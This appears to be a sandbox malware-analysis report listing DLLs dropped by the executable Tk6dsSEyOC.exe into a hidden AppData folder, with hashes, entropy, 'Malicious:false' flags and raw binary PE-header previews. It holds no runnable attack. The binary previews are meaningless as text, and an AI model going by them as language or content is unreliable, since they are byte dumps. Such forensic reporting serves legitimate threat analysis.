                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):19256
                                                                                                                                                  Entropy (8bit):7.088693688879585
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                                                                                                                                  MD5:6EA692F862BDEB446E649E4B2893E36F
                                                                                                                                                  SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                                                                                                                                  SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                                                                                                                                  SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):22328
                                                                                                                                                  Entropy (8bit):6.929204936143068
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                                                                                                                                  MD5:72E28C902CD947F9A3425B19AC5A64BD
                                                                                                                                                  SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                                                                                                                                  SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                                                                                                                                  SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18736
                                                                                                                                                  Entropy (8bit):7.078409479204304
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                                                                                                                                  MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                                                                                                                                  SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                                                                                                                                  SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                                                                                                                                  SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20280
                                                                                                                                                  Entropy (8bit):7.085387497246545
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                                                                                                                                  MD5:AEC2268601470050E62CB8066DD41A59
                                                                                                                                                  SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                                                                                                                                  SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                                                                                                                                  SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):19256
                                                                                                                                                  Entropy (8bit):7.060393359865728
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                                                                                                                                  MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                                                                                                                                  SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                                                                                                                                  SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                                                                                                                                  SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18744
                                                                                                                                                  Entropy (8bit):7.13172731865352
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                                                                                                                                  MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                                                                                                                                  SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                                                                                                                                  SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                                                                                                                                  SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):28984
                                                                                                                                                  Entropy (8bit):6.6686462438397
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                                                                                                                                                  MD5:8B0BA750E7B15300482CE6C961A932F0
                                                                                                                                                  SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                                                                                                                                                  SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                                                                                                                                                  SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):26424
                                                                                                                                                  Entropy (8bit):6.712286643697659
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
                                                                                                                                                  MD5:35FC66BD813D0F126883E695664E7B83
                                                                                                                                                  SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
                                                                                                                                                  SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
                                                                                                                                                  SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):73016
                                                                                                                                                  Entropy (8bit):5.838702055399663
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
                                                                                                                                                  MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
                                                                                                                                                  SHA1:47FA76778556F34A5E7910C816C78835109E4050
                                                                                                                                                  SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
                                                                                                                                                  SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):19256
                                                                                                                                                  Entropy (8bit):7.076072254895036
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                                                                                                                                                  MD5:8D02DD4C29BD490E672D271700511371
                                                                                                                                                  SHA1:F3035A756E2E963764912C6B432E74615AE07011
                                                                                                                                                  SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                                                                                                                                                  SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):22840
                                                                                                                                                  Entropy (8bit):6.942029615075195
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                                                                                                                                                  MD5:41A348F9BEDC8681FB30FA78E45EDB24
                                                                                                                                                  SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                                                                                                                                                  SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                                                                                                                                                  SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24368
                                                                                                                                                  Entropy (8bit):6.873960147000383
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                                                                                                                                                  MD5:FEFB98394CB9EF4368DA798DEAB00E21
                                                                                                                                                  SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                                                                                                                                                  SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                                                                                                                                                  SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):23488
                                                                                                                                                  Entropy (8bit):6.840671293766487
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                                                                                                                                                  MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                                                                                                                                                  SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                                                                                                                                                  SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                                                                                                                                                  SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20792
                                                                                                                                                  Entropy (8bit):7.018061005886957
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                                                                                                                                                  MD5:849F2C3EBF1FCBA33D16153692D5810F
                                                                                                                                                  SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                                                                                                                                                  SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                                                                                                                                                  SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18744
                                                                                                                                                  Entropy (8bit):7.127951145819804
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                                                                                                                                                  MD5:B52A0CA52C9C207874639B62B6082242
                                                                                                                                                  SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                                                                                                                                                  SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                                                                                                                                                  SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):117712
                                                                                                                                                  Entropy (8bit):6.598338256653691
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
                                                                                                                                                  MD5:A436472B0A7B2EB2C4F53FDF512D0CF8
                                                                                                                                                  SHA1:963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
                                                                                                                                                  SHA-256:87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
                                                                                                                                                  SHA-512:89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{*7.{*7.{*..x+>.{*..~+I.{*...+%.{*.x+$.{*..+'.{*.~+..{*..z+4.{*7.z*A.{*..~+>.{*..{+6.{*...*6.{*..y+6.{*Rich7.{*........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):334288
                                                                                                                                                  Entropy (8bit):6.808908775107082
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
                                                                                                                                                  MD5:60ACD24430204AD2DC7F148B8CFE9BDC
                                                                                                                                                  SHA1:989F377B9117D7CB21CBE92A4117F88F9C7693D9
                                                                                                                                                  SHA-256:9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
                                                                                                                                                  SHA-512:626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
                                                                                                                                                  Malicious:false
